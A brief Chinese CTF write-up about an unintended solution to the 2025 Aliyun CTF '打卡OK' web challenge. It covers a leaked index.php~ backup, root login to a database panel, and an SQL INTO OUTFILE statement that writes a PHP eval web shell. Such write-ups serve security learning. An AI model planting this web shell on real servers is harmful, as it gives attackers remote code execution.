159 字
1 分钟
2025阿里云CTF-打卡OK单题非预期wp
2025-02-26
CTF
CTF
/
WEB安全
/
WP

地址:AliyunCTF

完整WP:先知社区

进去先扫目录,扫到一个index.php~,明显~泄露,直接看代码: 2025阿里云CTF-打卡OK单题非预期wp/image-20250226205242.png 通过这段代码,我们能拿到这么几个文件:

/var/www/html/cache.php
/var/www/html/ok.php
/var/www/html/error.php

直接看ok.php

2025阿里云CTF-打卡OK单题非预期wp/image-20250226205329.png

访问进去,是个数据库的登录页面,root直接秒了(主办方赛后说这是用了开源镜像导致的)

后面就很简单了,直接写马就行,绝对路径代码里也有

select "<?php eval($_POST[1]); ?>" into outfile "/var/www/html/1.php"

2025阿里云CTF-打卡OK单题非预期wp/image-20250226205820.png

2025阿里云CTF-打卡OK单题非预期wp
https://blog.hdsec.cn/posts/2025阿里云ctf-打卡ok单题非预期wp/
作者
Hu@ng D0w
发布于
2025-02-26
许可协议
CC BY-NC-SA 4.0
© 2025 Hu@ng D0w. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari